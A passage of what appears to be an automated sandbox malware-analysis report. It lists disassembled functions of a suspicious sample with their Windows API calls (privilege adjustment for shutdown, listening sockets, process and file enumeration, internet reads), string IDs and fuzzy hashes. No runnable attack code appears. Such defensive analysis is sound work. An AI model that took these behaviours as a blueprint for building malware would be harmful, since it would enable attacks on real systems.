                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 973565025-2107944366
                                      • Opcode ID: a92a2714b17949f6355efd4f44cc7bb258045017b56d1dc25ca3be0d15ebbf91
                                      • Instruction ID: 9f4b870b3e233c45a9368e92610a34e0b877f8fa6737df0e2c6f799022fce965
                                      • Opcode Fuzzy Hash: a92a2714b17949f6355efd4f44cc7bb258045017b56d1dc25ca3be0d15ebbf91
                                      • Instruction Fuzzy Hash: 3B519B70218304AFDB10EF24DC96F6A77E8FB88714F404A2DF595972E1DB70A904DB92
                                      APIs
                                        • Part of subcall function 0096B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096B180
                                        • Part of subcall function 0096B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096B1AD
                                        • Part of subcall function 0096B134: GetLastError.KERNEL32 ref: 0096B1BA
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00977A0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: eac4dd8aaac4954d4027ac4c775d992a8e004e7d08e3233af37144ca77869002
                                      • Instruction ID: f282d7d2493c62f8041c0e3a3797b9f4ff38813ab0ca20358a9e360e9b7855bd
                                      • Opcode Fuzzy Hash: eac4dd8aaac4954d4027ac4c775d992a8e004e7d08e3233af37144ca77869002
                                      • Instruction Fuzzy Hash: 2901A7736692126AFB2C66F8DC5ABBFB25C9B00750F148924B957E20D2E5A55E0081B0
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00988CA8
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988CB7
                                      • bind.WS2_32(00000000,?,00000010), ref: 00988CD3
                                      • listen.WS2_32(00000000,00000005), ref: 00988CE2
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988CFC
                                      • closesocket.WS2_32(00000000), ref: 00988D10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 289140efd52f52a9824fe480b8841caa1cb7567a01d2f827bba5611e784fdce8
                                      • Instruction ID: f982aea551d2243afcd9cdbc123f14612b95654a23c8769543a62caa59592da3
                                      • Opcode Fuzzy Hash: 289140efd52f52a9824fe480b8841caa1cb7567a01d2f827bba5611e784fdce8
                                      • Instruction Fuzzy Hash: 1A21F371600201AFCB10FF28CD85B6EB7A9EF88320F108158F956A73D2CB70AD019B61
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00976554
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00976564
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00976583
                                      • __wsplitpath.LIBCMT ref: 009765A7
                                      • _wcscat.LIBCMT ref: 009765BA
                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009765F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                      • String ID:
                                      • API String ID: 1605983538-0
                                      • Opcode ID: 4de20dcd3a16911c18cbe65724bb541010b3a2836474997a184e774b7b6aadce
                                      • Instruction ID: eb5069e87578673e99cd1130fd70acac11400d1afd6563bc92f036d6e37c1e74
                                      • Opcode Fuzzy Hash: 4de20dcd3a16911c18cbe65724bb541010b3a2836474997a184e774b7b6aadce
                                      • Instruction Fuzzy Hash: 2621A472904218ABDB10EBA4CD88FEEB7BCAB49310F5044E5F909E7141EB759F85DB60
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$ZZQCWCVCM
                                      • API String ID: 0-1888135884
                                      • Opcode ID: cfcd1240021b735516ba8c4bab76907567f685bf7488782fee32865184a5c7dc
                                      • Instruction ID: a88e93455b397819ac4531da217868bf87299c9988827c24b2ae1b98e3e52514
                                      • Opcode Fuzzy Hash: cfcd1240021b735516ba8c4bab76907567f685bf7488782fee32865184a5c7dc
                                      • Instruction Fuzzy Hash: E992A0B1E0421ACBDF24CF58C9807FDB7B5BB54324F1485AAE856AB280D7B49D81CF91
                                      APIs
                                        • Part of subcall function 0098A82C: inet_addr.WS2_32(00000000), ref: 0098A84E
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00989296
                                      • WSAGetLastError.WS2_32(00000000,00000000), ref: 009892B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: d131b8f284551c2ac7ee8538cf3e5085b87cfa268f900d2a648634cf4cba67ab
                                      • Instruction ID: 4a8690ae8dd477628bc42a5295578de4f1e28b925d991cd0d7b40e1e0a8afad5
                                      • Opcode Fuzzy Hash: d131b8f284551c2ac7ee8538cf3e5085b87cfa268f900d2a648634cf4cba67ab
                                      • Instruction Fuzzy Hash: 3841BF71600604AFDB14BF68C882F7E77EDEF84724F148548F956AB392DA749E018BA1
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0097EB8A
                                      • _wcscmp.LIBCMT ref: 0097EBBA
                                      • _wcscmp.LIBCMT ref: 0097EBCF
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0097EBE0
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0097EC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                      • String ID:
                                      • API String ID: 2387731787-0
                                      • Opcode ID: 1ffe726b1613f1230d11b5bc48042861f593f3facb72ef079ee2917758238332
                                      • Instruction ID: 6c5db2f52be87bf785004d2ba0bfdc749a0d0898e05fbed1d044c000c61cbfa9
                                      • Opcode Fuzzy Hash: 1ffe726b1613f1230d11b5bc48042861f593f3facb72ef079ee2917758238332
                                      • Instruction Fuzzy Hash: 1D41B0756047029FC708DF28C491E99B7E8FF89324F14859DF95A8B3A1DB31A944CB91
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: dfddc379ecae9a330224c1d4401d6a04ab9f717a9fd9e674a944d97b1ae2b3ae
                                      • Instruction ID: caac45d32423c0e33fa362caa9b18f65d0ada78a15191a4e79eb570dca2fa0d4
                                      • Opcode Fuzzy Hash: dfddc379ecae9a330224c1d4401d6a04ab9f717a9fd9e674a944d97b1ae2b3ae
                                      • Instruction Fuzzy Hash: E911B2317091156FEB311F2ADC44F6FB79DEF85761B04042DF849D7281DF34A90286A4
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • GetCursorPos.USER32(?), ref: 0099F211
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009AE4C0,?,?,?,?,?), ref: 0099F226
                                      • GetCursorPos.USER32(?), ref: 0099F270
                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,009AE4C0,?,?,?), ref: 0099F2A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                      • String ID:
                                      • API String ID: 1423138444-0
                                      • Opcode ID: f095342275bfab2876025e6706e447e004abe645081d50941bae0ba84e62666b
                                      • Instruction ID: 8c254188a30e0a7d59baec0982fb253298553a75bf1e47865bd032b2e096da2f
                                      • Opcode Fuzzy Hash: f095342275bfab2876025e6706e447e004abe645081d50941bae0ba84e62666b
                                      • Instruction Fuzzy Hash: F421B439501018EFDF298F58C968EFEBBB9EF49321F044065F915871A1D3309D90EB90
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0094B5A5
                                      • GetClientRect.USER32(?,?), ref: 009AE69A
                                      • GetCursorPos.USER32(?), ref: 009AE6A4
                                      • ScreenToClient.USER32(?,?), ref: 009AE6AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                      • String ID:
                                      • API String ID: 1010295502-0
                                      • Opcode ID: 331f162db6b226d871f7b2c3acfdbbb63bc6c62ca3e6379712e34747893938d0
                                      • Instruction ID: b23031488ab4169102ab3bf61786fb9fdca5cc39a6a1fc64d55b9a2a50e448ad
                                      • Opcode Fuzzy Hash: 331f162db6b226d871f7b2c3acfdbbb63bc6c62ca3e6379712e34747893938d0
                                      • Instruction Fuzzy Hash: 2811363190102AFFCB10EF98CD85EAEB7B8EB49314F000851F901E7140E334EA91DBA1
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009713DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 73da8198924ee6abcd144b11fc25ecb34998a7e52dc0f8af1474a4955f0d3596
                                      • Instruction ID: ea1278a19521bf7a731ed1cc0ca5e3e1e7c9e356b8dbefb3e08aee45fa1ce4ec
                                      • Opcode Fuzzy Hash: 73da8198924ee6abcd144b11fc25ecb34998a7e52dc0f8af1474a4955f0d3596
                                      • Instruction Fuzzy Hash: 8B321475A007059FC728CF69C481AAAB7F4FF48320B15C56EE59ADB3A1E770E941CB44
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0094B22F
                                        • Part of subcall function 0094B55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 0094B5A5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DialogNtdllProc_$LongWindow
                                      • String ID:
                                      • API String ID: 1155049231-0
                                      • Opcode ID: cfbba513c5b0dedc37d53896fb24010cbdc9a6049330b639281628841f8f887f
                                      • Instruction ID: dea60bd5c38aafd112063c4e312c6ab3502c777c07ae3307677cde6343528874
                                      • Opcode Fuzzy Hash: cfbba513c5b0dedc37d53896fb24010cbdc9a6049330b639281628841f8f887f
                                      • Instruction Fuzzy Hash: BBA18770118105BADF38AF2E5C98FBF399CEBAB354B144919F412D21A5DB69DC00E3B2
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009843BF,00000000), ref: 00984FA6
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00984FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 728b9662f743d8102c0c430e0184d41ee79c3ae769562cf44892f2dcf57f7bff
                                      • Instruction ID: a19694b3bc963b04a175054517a3ce83fe92c9118d4d318cba7f855fb2375079
                                      • Opcode Fuzzy Hash: 728b9662f743d8102c0c430e0184d41ee79c3ae769562cf44892f2dcf57f7bff
                                      • Instruction Fuzzy Hash: 8841E47150420ABFEB21EE80CC85FBF77ACEF80364F10406EF605A6281EA759E45D7A0
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097E20D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0097E267
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0097E2B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 4999fb99675d559aeadf14d0366d393ec125a785de753ca9153f16c92f93c56d
                                      • Instruction ID: cf62f138e05b1425528c29d0017595280cc02c701ce2b28b3aaed78d627d6e70
                                      • Opcode Fuzzy Hash: 4999fb99675d559aeadf14d0366d393ec125a785de753ca9153f16c92f93c56d
                                      • Instruction Fuzzy Hash: AE216D75A10218EFCB04EFA5D885EADFBB8FF88310F0484A9E945AB251DB319905CB50
                                      APIs
                                        • Part of subcall function 0094F4EA: std::exception::exception.LIBCMT ref: 0094F51E
                                        • Part of subcall function 0094F4EA: __CxxThrowException@8.LIBCMT ref: 0094F533
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096B180
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096B1AD
                                      • GetLastError.KERNEL32 ref: 0096B1BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: 388f6e9e7d6a2f86c014b3fa22ceb09493d8287c7d45e7929fdc447fd7881387
                                      • Instruction ID: 02116bdc0036712459970ea4a1d7bd7b5987cf04538bc4123c07ae4a9c11d34b
                                      • Opcode Fuzzy Hash: 388f6e9e7d6a2f86c014b3fa22ceb09493d8287c7d45e7929fdc447fd7881387
                                      • Instruction Fuzzy Hash: 9011BCB2518205BFE718AF64DC96E2BB7BCEB44320B21852EE05693250EB70FC418A60
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009766AF
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009766EC
                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009766F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: ebbd1e379d173a0970e229df303b7e877fef47e4857411efd528c7394cef25de
                                      • Instruction ID: 07a18689b03063e6aebde8dc258ff569d51d049f1dbed17ba1115ad9d6ebb065
                                      • Opcode Fuzzy Hash: ebbd1e379d173a0970e229df303b7e877fef47e4857411efd528c7394cef25de
                                      • Instruction Fuzzy Hash: 7211A5B2915228BEE7108BA8DC45FAF77BCEB04764F004656F905E7191D2749E0487A5
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00977223
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0097723A
                                      • FreeSid.ADVAPI32(?), ref: 0097724A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
